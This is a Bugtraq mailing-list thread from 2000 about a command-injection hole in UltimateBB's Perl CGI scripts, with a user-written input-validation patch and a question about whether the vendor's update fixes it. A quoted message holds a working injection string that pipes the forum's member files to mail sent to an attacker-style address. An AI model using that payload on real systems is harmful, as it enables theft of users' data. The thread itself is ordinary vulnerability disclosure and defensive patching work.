Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: perl-cgi hole in UltimateBB by Infopop Corp.
From: ILazar () TBG COM (Irwin Lazar)
Date: Thu, 17 Feb 2000 07:24:30 -0700


according to the folks at UBB, the latest version 5.43d, fixes this
vulnerability.  Has anyone been able to verify if this is in fact correct?

Irwin

-----Original Message-----
From: Jordan Ritter [mailto:jpr5 () BOS BINDVIEW COM]
Sent: Tuesday, February 15, 2000 8:48 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp.


On Mon, 14 Feb 2000, Kevin Hillabolt wrote:

# It works on the full version also...
#
# Little different syntax:
# topic=012345.cgi|cat%20../Members/*|mail hacker () evil org|
# (note the ../ on the Members.  You have to go up a
directory to get the
# file.  Maybe you could stop it via simple folder permissions??)

Provided with no warranty.  unescape() borrowed from the far superior
CGI.pm.  It appears to work, but I haven't checked it for
completeness.
The ubb scripts are a programming disaster, and pass around
metachars and
filenames through form parameters, making input validation difficult.
The patch below selectively validates input based on the name of the
variable we're validating (i.e. only certain variables are dangerous;
others are just dumb and not a risk).  It's better to try and
validate at
the top leven then code review the source and try to patch
every idiotic
mistake that was made.  At the very least, this stops the
specific attack
that was posted.  There could be other holes that this
doesn't cover, or
alternative ways to carry out the same attack.  Hopefully
Infopop will get
their act together soon.

I can't believe they distribute this crap as commercial software.
Actually, what I can't believe is how many people paid for
it.  God help
us all.


--jordan


$ diff ubb_library.pl ubb_library.pl.orig
84,93d83
< # unescape URL-encoded data
< sub unescape {
<     shift() if ref($_[0]);
<     my $todecode = shift;
<     return undef unless defined($todecode);
<     $todecode =~ tr/+/ /;       # pluses become spaces
<     $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
<     return $todecode;
< }
<
1047a1038

1112,1120d1102
<       # clean input
<     if ($key =~ /^(forum|topic|number|replynum)$/i) {
<         my($newval) = &unescape($val);
<
<         if ($newval !~ /^([ -\ () \w ]+)$/) {
<             $val = "bad_input";
<         }
<     }
<
1266,1284d1247
<
< my(@out);
< foreach $row (@in) {
<     my($name,$value) = split ("=", $row);
<
<     if ($name =~ /^(forum|topic|number|replynum)$/i) {
<         my($newvalue) = &unescape($value);
<
<         if ($newvalue !~ /^([ -\ () \w ]+)$/) {
<             $value = "bad_input";
<         }
<
<         push @out, "$name=$value";
<      } else {
<         push @out, $row;
<      }
< }
<    @in = @out;


<HR NOSHADE>
<UL>
<LI>application/octet-stream attachment: Irwin_Lazar__E-mail_.vcf
</UL>


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]